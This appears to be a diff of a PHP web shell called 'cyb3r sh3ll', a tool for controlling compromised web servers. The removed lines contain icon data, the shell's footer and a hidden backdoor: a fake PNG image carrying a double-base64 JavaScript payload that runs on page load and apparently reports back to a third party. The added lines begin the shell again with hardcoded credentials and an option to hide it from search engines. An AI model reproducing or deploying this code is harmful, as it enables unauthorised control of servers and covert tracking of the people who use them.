-"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".

-

-"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".

-

-"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".

-

-"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".

-

-"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".

-

-"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".

-

-"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",

-

-"up"=>

-

-"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".

-

-"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".

-

-"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".

-

-"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",

-

-"write"=>

-

-"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".

-

-"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".

-

-"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".

-

-"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",

-

-"ext_asp"=>

-

-"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".

-

-"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".

-

-"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",

-

-"ext_mp3"=>

-

-"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".

-

-"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".

-

-"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",

-

-"ext_avi"=>

-

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".

-

-"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".

-

-"PYXCyg+V2i44XeRmSfYqsGhAAgA7",

-

-"ext_cgi"=>

-

-"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".

-

-"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".

-

-"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".

-

-"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".

-

-"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".

-

-"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".

-

-"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".

-

-"RYtMAgEAOw==",

-

-"ext_cmd"=>

-

-"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".

-

-"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".

-

-"dmrYAMn1onq/YKpjvEgAADs=",

-

-"ext_cpp"=>

-

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".

-

-"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".

-

-"Eq7YrLDE7a4SADs=",

-

-"ext_ini"=>

-

-"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".

-

-"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".

-

-"SnEjgPVarHEHgrB43JvszsQEADs=",

-

-"ext_diz"=>

-

-"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".

-

-"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".

-

-"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".

-

-"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".

-

-"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".

-

-"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".

-

-"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".

-

-"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".

-

-"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".

-

-"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".

-

-"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".

-

-"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".

-

-"Ow==",

-

-"ext_doc"=>

-

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".

-

-"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".

-

-"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",

-

-"ext_exe"=>

-

-"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".

-

-"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".

-

-"xhIAOw==",

-

-"ext_h"=>

-

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".

-

-"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".

-

-"Wq/NknbbSgAAOw==",

-

-"ext_hpp"=>

-

-"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".

-

-"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".

-

-"UqUagnbLdZa+YFcCADs=",

-

-"ext_htaccess"=>

-

-"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".

-

-"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".

-

-"AAA7",

-

-"ext_html"=>

-

-"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".

-

-"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".

-

-"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".

-

-"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".

-

-"ADs=",

-

-"ext_jpg"=>

-

-"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".

-

-"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".

-

-"FxEAOw==",

-

-"ext_js"=>

-

-"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".

-

-"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".

-

-"a00AjYYBbc/o9HjNniUAADs=",

-

-"ext_lnk"=>

-

-"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".

-

-"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".

-

-"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".

-

-"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".

-

-"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".

-

-"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".

-

-"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".

-

-"ADs=",

-

-"ext_log"=>

-

-"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".

-

-"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",

-

-"ext_php"=>

-

-"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".

-

-"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",

-

-"ext_pl"=>

-

-"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".

-

-"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",

-

-"ext_swf"=>

-

-"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".

-

-"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".

-

-"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".

-

-"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".

-

-"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",

-

-"ext_tar"=>

-

-"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".

-

-"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".

-

-"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".

-

-"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".

-

-"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".

-

-"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".

-

-"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".

-

-"u4tLAgEAOw==",

-

-"ext_txt"=>

-

-"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".

-

-"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".

-

-"UpPWG3Ig6Hq/XmRjuZwkAAA7",

-

-"ext_wri"=>

-

-"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".

-

-"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",

-

-"ext_xml"=>

-

-"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".

-

-"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".

-

-"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".

-

-"IQA7"

-

- );

-

- //For simple size- and speed-optimization.

-

- $imgequals = array(

-

-  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),

-

-  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),

-

-  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),

-

-  "ext_html"=>array("ext_html","ext_htm"),

-

-  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),

-

-  "ext_lnk"=>array("ext_lnk","ext_url"),

-

-  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),

-

-  "ext_doc"=>array("ext_doc","ext_dot"),

-

-  "ext_js"=>array("ext_js","ext_vbs"),

-

-  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),

-

-  "ext_wri"=>array("ext_wri","ext_rtf"),

-

-  "ext_swf"=>array("ext_swf","ext_fla"),

-

-  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),

-

-  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")

-

- );

-

- if (!$getall)

-

- {

-

-  header("Content-type: image/gif");

-

-  header("Cache-control: public");

-

-  header("Cache-control: max-age=".(60*60*24*7));

-

-  header("Last-Modified: ".date("r",filemtime(__FILE__)));

-

-  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}

-

-  if (empty($images[$img])) {$img = "small_unk";}

-

-  if (in_array($img,$ext_tar)) {$img = "ext_tar";}

-

-  echo base64_decode($images[$img]);

-

- }

-

- else

-

- {

-

-  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}

-

-  natsort($images);

-

-  $k = array_keys($images);

-

-  echo  "<center>";

-

-  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}

-

-  echo "</center>";

-

- }

-

- exit;

-

-}

-

-?>

-

-</td></tr></table><a bookmark="minipanel" /><br/>

-<?php

-}

-?>

-<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor='#C0C0C0'><tr><td height="1" valign="top"><table align="center"><tr><td height="0" valign="top"><center><font face="times, serif" size="3"><b>(C) <font color="orange">Copyright</font><font color="white"> cyb3r </font><font color="green">9l4d!470r</font> [All rights reserved]</b></center></td></tr><tr><td height="0" valign="top"><center><b>Greetz to :</b> r45c4l bro, r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot.</center></td></tr><tr><td height="0" valign="top"><center><b>--[ cyb3r sh3ll v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u>Coded by</u></a> cyb3r 9l4d!470r (cyber gladiator) | <a href="#"><font color="#FF0000">h4cK2b0yZz..</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></font></center></td></tr></table></td></tr></table>

-</center>

-<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>

-<script type="text/javascript">

-if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};

-setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(11);}, 500);

-</script>

+<?php
+//Authentication
+$lock = "on"; // set this to off if you dont need the login page
+$user = "cyber";
+$pass = "gladiator";
+$antiCrawler            = "on"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
